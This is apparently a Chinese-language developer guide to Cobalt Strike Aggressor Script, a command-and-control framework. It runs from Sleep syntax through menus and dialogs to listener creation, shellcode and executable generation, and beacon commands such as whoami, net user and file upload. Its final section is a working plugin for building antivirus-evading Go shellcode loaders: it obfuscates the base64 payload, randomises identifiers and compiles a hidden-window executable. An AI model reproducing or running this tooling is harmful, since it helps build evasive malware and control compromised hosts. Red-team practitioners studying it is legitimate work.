cs插件开发
Cobalt Strike Aggressor Script 开发指南
1. 简介
Aggressor Script (简称agscript)是Cobalt Strike 3.0+版本中内置的脚本语言,基于Raphael Mudge的Sleep语言的二次开发。它允许用户扩展和自定义Cobalt Strike的功能。
1.1 相关资源
- Sleep语言手册: http://sleep.dashnine.org/manual/
- Aggressor Script官方文档: https://trial.cobaltstrike.com/aggressor-script
- 函数参考: https://trial.cobaltstrike.com/aggressor-script/functions.html
1.2 脚本控制台
通过View > Script Console可以进入agscript控制台,用于跟踪、配置、调试和管理脚本。
2. Sleep语言基础
2.1 基本语法
- 语句之间必须有空格:
`$y = 3`(正确)vs `$y=3`(错误)
- println 和 warn 函数:warn 的输出包含文件名和行号,便于调试
2.2 变量类型
$x = "Hello World"; # string
$y = 3; # number
$z = @(1, 2, 3, "four"); # array literal @( ... ); elements may mix types
$a = %(a => "apple", b => "bat", c => "awesome language", d => 4); # hash literal %(key => value, ...)
2.3 数组操作
# Iterate over an array: the loop variable takes each element in turn.
foreach $index ($data) {
println($index);
}
# Add an element at the given position (third argument).
# NOTE(review): $a is the hash from the previous example; presumably an array was intended — confirm.
add($a, "wYYYYYYYYYYYYYYYYYYYYYYYY", -1);
# Remove elements: remove() takes the values to delete, not an index.
remove($a, -1, "data");
2.4 字典操作
# Iterate over a hash by its keys.
foreach $data (keys(%z)) {
println("$data =>".%z[$data]);
}
# Iterate over key/value pairs directly.
foreach $key => $value (%z) {
println("$key => $value");
}
# Delete keys with removeAt().
removeAt(%a, "data"); # delete a single key
removeAt(%a, "data", "data2"); # delete several keys in one call
2.5 字符串操作
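# String interpolation: $var expands inside double quotes, \$ gives a literal $,
# and "$x $+ $y" joins the two values without the space ($+ is in-string concatenation).
println("\$a is: $a and \n\$x joined with \$y is: $x $+ $y");
# Concatenation with the . operator.
$a = "data"."data";
# replace(string, pattern, replacement) — the pattern is a regular expression.
$a = replace($a, "data", "Fk");
# Length of a string.
println(strlen($data));
# Substring starting at index 0.
println(substr($data, 0, 3));
# split(pattern, string) takes a regular expression, so a literal dot must be escaped;
# an unescaped '.' matches every character and produces only empty fields.
$b = split('\.', $a);
# Join parts into one string with a separator.
# NOTE(review): join() is documented as join(separator, @array); only scalars are passed here — confirm it accepts them.
println(join("ape", "bat", "cat", "dog"));
# Substring test: isin checks for a substring ("in" tests array/hash membership instead).
if ($str isin $data) {
println(111);
}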
2.6 函数定义
# Sub definition; positional arguments arrive as $1, $2, ...
sub addTwoValues {
println($1 + $2);
}
addTwoValues("3", 55.0);
# Take a reference to a sub with &name ...
$addf = &addTwoValues;
[$addf : "3", 55.0]; # ... and invoke it through the [$ref : args] form
2.7 条件判断
# 数字比较
== != < > <= >=
# 字符串比较
eq ne lt gt isin iswm
2.8 循环
# range($1, $2) returns an iterator closure: each call yields the next number and $null
# once $begin passes $end (foreach over a closure stops at $null). $begin and $end are
# bound into the lambda's own scope.
# NOTE(review): if ++ is a post-increment here, the first value is $begin - 1 rather than $begin — confirm.
sub range {
return lambda({
return iff($begin <= $end, $begin++ - 1, $null);
}, $begin => $1, $end => $2);
}
# "ready" fires once the client is connected; print the iterator's values, then close the client.
on ready {
foreach $value (range(1, 10)) {
println($value);
}
closeClient();
}
2.9 文件操作
# Read a file line by line: readln() returns $null at end of file, which ends the loop.
$handle = openf("/etc/passwd");
while $text (readln($handle)) {
println("Read: $text");
}
closef($handle);
# Read a whole file at once: readb() with -1 returns the complete contents.
$handle = openf("/path/to/key.pem");
$keydata = readb($handle, -1);
closef($handle);
# Write text: a leading ">" in the openf() argument opens the file for writing.
$handle = openf(">data.txt");
println($handle, "this is some data.");
closef($handle);
# Write raw bytes with writeb().
$handle = openf(">out.txt");
writeb($handle, $data);
closef($handle);
3. Cobalt Strike 开发
3.1 事件管理
# Event handler: runs once the client is connected; show_message() pops up a message box.
on ready {
show_message("welcome 老铁666");
}
3.2 控制台文本颜色
# Console formatting: \cX selects colour X, \U underlines, \o resets to normal text.
println("\c1Red Text\o Normal Text");
3.3 命令快捷键
# Defines the script-console command "test"; its arguments arrive as $1, $2, ...
command test {
println("value: $1");
}
3.4 快捷键绑定
# Binds a keyboard shortcut in the client to the block.
bind Ctrl+H {
show_message("DIO");
}
3.5 菜单项
# Extends the built-in "help" menu: item(label, callback) adds an entry, menu adds a
# submenu; & marks the mnemonic character of a label.
popup help {
item("&blog", { url_open("https://www.google.com"); });
menu "&game" {
item("&4399", { url_open("https://www.4399.com/"); });
}
}
# menubar(label, id) adds a top-level menu; its entries come from a popup block with the same id.
menubar("新菜单项","new");
3.6 对话框
# Top-level menu whose single entry opens the dialog built by dialogtest().
menubar("新菜单项","new");
popup new {
item("&dialog", { dialogtest(); });
}
# Builds and shows a dialog. The %() hash gives each field's initial value and
# &callback receives the submitted values; rows appear in the order they are added.
sub dialogtest {
$dialog = dialog("dialogTest", %(listener => "", bid => "1", bit => false, str => "string", file => ""), &callback);
dbutton_action($dialog, "submit"); # button that triggers the callback
dialog_description($dialog, "dialog 测试");
drow_listener($dialog, "listener", "选择监听器"); # listener drop-down
drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload"); # checkbox
drow_beacon($dialog, "bid", "Session: "); # beacon (session) picker
drow_text($dialog, "str", "输入文本"); # free-text field
drow_file($dialog, "file", "Choose: "); # file chooser
dialog_show($dialog);
}
# Dialog callback: $1 is the dialog, $2 the button pressed, $3 the hash of submitted values.
sub callback {
println("dialog $1");
show_message("Pressed $2 传入参数 $3");
}
3.7 文件保存对话框
# Console command "file": opens a save-file prompt; the chosen path arrives as $1 in
# the callback and a fixed line of text is written to it.
command file {
prompt_file_save("111", {
println($1);
local('$handle'); # keep the handle out of the global scope
$handle = openf("> $+ $1"); # "> " selects write mode; $+ appends the path
println($handle, "I am content");
closef($handle);
});
}
4. Beacon之外的操作
4.1 监听器管理
# Create a listener (Cobalt Strike 4.0+): name, payload type, and an options hash.
listener_create_ext("111", "windows/beacon_http/reverse_http", %(host => "127.0.0.1", port => 80, beacons => "127.0.0.1"));
# Console command "list": prints every listener name followed by its info hash.
command list {
foreach $listener (listeners()) {
println("name: $listener");
$data = listener_info($listener);
foreach $key => $value (%data) { # %data and $data name the same variable
println("$key => $value");
}
println("");
}
}
4.2 Shellcode生成
# Console command: shellcode_create <listenname> <remote_host> <arch>.
# Passes the three arguments to shellcode() and writes the result to shellcode.bin
# (relative path); prints the usage line when any argument is empty.
command shellcode_create {
$listenname = $1;
$handle = $2;
$arch = $3;
if((strlen($listenname) > 0) && (strlen($handle) > 0) && (strlen($arch) > 0)) {
println("Arch: $arch");
println("listen name: $listenname");
println("handle: $handle");
$data = shellcode($listenname, $handle, $arch);
$dk = openf(">shellcode.bin");
writeb($dk, $data);
closef($dk);
println("create shellcode.bin sucess");
} else {
println("shellcode_create <listenname> <remote_host> <arch>");
}
}
4.3 生成可执行文件
# Console command "exe": builds an x64 exe artifact for listener "ttt" and writes it to out.exe.
command exe {
$data = artifact("ttt", "exe", "x64");
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
}
5. Beacon操作
5.1 Beacon信息
# Console command "info": prints each beacon's record and its "computer" field.
command info {
foreach $beacon (beacons()) {
println($beacon);
println(beacon_info($beacon['id'], "computer"));
}
}
5.2 命令别名
# Beacon console alias "w"; $1 is the beacon id the alias was typed in.
alias w {
bshell!($1, "whoami");
}
5.3 新Beacon初始化
# Runs when a new beacon first checks in; $1 is its id.
beacon_initial {
bsleep($1, 3, 0);
binput($1, "shell whoami");
}
5.4 右键菜单
# Right-click entries for the selected beacons; the item's $1 is the array of selected ids.
# The lambda captures those ids as @ids because inside the prompt callback $1 is the typed text.
popup beacon_bottom {
item "query user" {
prompt_text("Query User", "administrator", lambda({
bshell(@ids, "net user ".$1);
}, @ids => $1));
}
menu "test" {
item "query user" { # same entry inside a submenu; $ids and @ids are the same variable
prompt_text("Query User", "administrator", lambda({
bshell($ids, "net user ".$1);
}, $ids => $1));
}
}
}
5.5 文件上传
bupload $beacon_id $local_file_path;
5.6 批量Note操作
# Right-click entry "Note2": reads the note of the first selected beacon, prompts for a
# new one, and passes the selected ids plus the entered text to mynote().
popup beacon_bottom {
item "&Note2" {
println($1[0]);
local('$note');
$note = beacon_info($1[0], "note");
println($note);
prompt_text("Set Beacon Note2:", $note, lambda({
mynote($bids, $1);
}, $bids => $1));
}
}
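# Sets $2 as the note on every beacon whose computer and user match those of the
# first id in $1.
# $1: array of selected beacon ids (only the first is used as the reference)
# $2: note text
sub mynote {
local('$bids $note $com $user $bid $entry'); # keep working variables out of the global scope
$bids = $1;
$note = $2;
# The reference computer/user do not change inside the loop, so look them up once.
$com = beacon_info($bids[0], 'computer');
$user = beacon_info($bids[0], 'user');
$bid = @();
foreach $entry (beacons()) {
if ($com eq $entry['computer'] && $user eq $entry['user']) {
add($bid, $entry['id']);
}
}
beacon_note($bid, $note);
}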
6. 免杀技术示例
6.1 Go语言条件触发免杀
# Top-level menu (id "bypass") with one submenu entry that opens the Generator() dialog.
menubar("免杀","bypass");
popup bypass {
menu "&shellcode加载" {
item("&go(条件触发)", {
Generator();
});
}
}
# Dialog collecting a listener, an x64 checkbox and a URL; the submit button calls build().
sub Generator {
$dialog = dialog("title", %(listener => "", bit => false, url => ""), &build);
dbutton_action($dialog, "submit");
dialog_description($dialog, "该插件用于快速生成免杀的可执行文件");
drow_listener($dialog, "listener", "Listener: ");
drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload");
drow_text($dialog, "url", "dizhi");
dialog_show($dialog);
}
# Dialog callback for Generator(): $3 holds the submitted field values.
# Decodes an embedded Go source template (the base64 literal is a placeholder on this
# page), substitutes the listener's shellcode and the dialog values into it, writes it
# to a fixed temp path and runs `go generate` on it. Files left on the operator host:
# the temp .go file (C:\windows\temp\temp.go or /tmp/temp.go, deleted by the build
# command on success) and the output exe at the chosen path.
sub build {
# The checkbox value arrives as the string "false"/"true"; it selects both the shellcode arch and GOARCH.
if ($3["bit"] eq "false") {
$system = "x86";
$arch = "386";
} else {
$system = "x64";
$arch = "amd64";
}
# Placeholder: base64 of the Go source template.
$code = base64_decode("go文件base64");
$shell_code = shellcode($3["listener"], false, $system);
$b64shell_code = base64_encode($shell_code);
# Swap selected characters of the base64 text before it is embedded.
$b64shell_code = replace($b64shell_code, 'A', '#');
$b64shell_code = replace($b64shell_code, 'H', '!');
$b64shell_code = replace($b64shell_code, '1', '@');
$b64shell_code = replace($b64shell_code, 'T', ')');
# Fill the template placeholders (replace() treats the pattern as a regex, hence the escaped braces).
$code = replace($code, "your base64shellcode", $b64shell_code);
$code = replace($code, '\{url\}', $3["url"]);
# Random identifiers for the template: one letter followed by one alphanumeric character.
$string1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$string2 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$KEY_2 = charAt($string1, rand(52)).charAt($string2, rand(62));
# ... the page shows only one of the generated names
# Substitute the identifiers into the template.
$code = replace($code, '\{2\}', $KEY_2);
# ... and the remaining ones
# Save prompt: $1 is the chosen output path. The go:generate line is built per host OS
# (systemProperties()["os.name"]), inserted into the template, then the file is written
# and `go generate` is executed.
prompt_file_save("aabbcc.exe", {
$path = "$1";
if ("*Windows*" iswm systemProperties()["os.name"]) {
$path = replace($path, "/", "\\");
$build = "//go:generate cmd /c set GOOS=windows&& set GOARCH=$+ $arch $+ && go build -o $path -ldflags \"-w -s -H=windowsgui\" C:\\\\windows\\\\temp\\\\temp.go && del C:\\\\windows\\\\temp\\\\temp.go";
$gofile = "C:\\\\windows\\\\temp\\\\temp.go";
$handle = openf("> $+ $gofile");
} else {
$build = "//go:generate bash -c \"GOOS=windows&& GOARCH=$+ $arch && go build -o $path -ldflags \"-w -s -H=windowsgui\" /tmp/temp.go && rm /tmp/temp.go\"";
$gofile = "/tmp/temp.go";
$handle = openf("> $+ $gofile");
}
$code = replace($code, '\{GONERATE\}', $build);
writeb($handle, $code);
closef($handle);
$space = " ";
exec("go generate $+ $space $+ $gofile"); # runs go generate on the temp file from the client host
show_message("save to $+ $1");
});
}
7. 总结
本指南涵盖了Cobalt Strike Aggressor Script开发的各个方面,从基础语法到高级功能。关键点包括:
- Sleep语言基础:变量、数组、字典、字符串操作、函数和控制结构
- Cobalt Strike集成:事件处理、菜单、对话框和快捷键
- Beacon操作:信息获取、命令执行和文件管理
- 监听器和payload生成
- 免杀技术实现
通过掌握这些技术,您可以扩展Cobalt Strike的功能,创建自定义工具和自动化工作流程,提高红队操作的效率和隐蔽性。